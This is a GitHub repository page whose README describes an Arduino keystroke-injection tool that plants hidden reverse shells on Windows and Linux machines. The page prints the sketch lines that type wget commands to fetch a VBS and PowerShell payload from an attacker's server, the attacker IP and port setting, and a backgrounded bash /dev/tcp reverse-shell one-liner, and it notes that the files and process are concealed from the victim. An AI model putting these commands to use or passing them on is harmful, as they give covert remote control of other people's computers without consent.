Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

EvtDanya/Reverse-Shell-Arduino

Open more actions menu

Repository files navigation

Reverse Shell Arduino

Hidden reverse shells with arduino

How to start

• To use in Windows, make local http server with python:

python -m http.server 80

edit file reverse_shell_win.ino and specify address to file:

//set address to ur reverse shell file and vbs file
delay(1000);
Keyboard.println("wget \"http://<address_to_your_file>/hidden.vbs\" -outfile \"C:\\hidden.vbs\"");
delay(1000);
Keyboard.println("wget \"http://<address_to_your_file>/rev.ps1\" -outfile \"C:\\rev.ps1\"");

edit rev.ps1 file and specify ip and port of your machine from which you will use reverse shell:

$LHOST = "IP"; $LPORT = <PORT>;

• To use in Linux just edit file reverse_shell_win.ino and specify ip and port of your machine:

Keyboard.println("nohup /bin/bash -c \"/bin/bash -i >& /dev/tcp/<IP>/<PORT> 0>&1\" >/dev/null 2>&1 &; disown; exit");

Examples

After connecting the arduino to a windows machine, the necessary files are downloaded and the hidden attribute is set to them so that they are not visible:

hidden_files

And our reverse shell is launched:

reverse_shell_in_windows

After connecting the arduino to a linux machine, a command is run in the background and it can now be detected only through the list of system processes:

reverse_shell_in_linux

Feedback

If you have any questions or suggestions, please dm me https://t.me/d3f3nd3r

About

Reverse shells both for Windows and Unix systems

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published
Morty Proxy This is a proxified and sanitized view of the page, visit original site.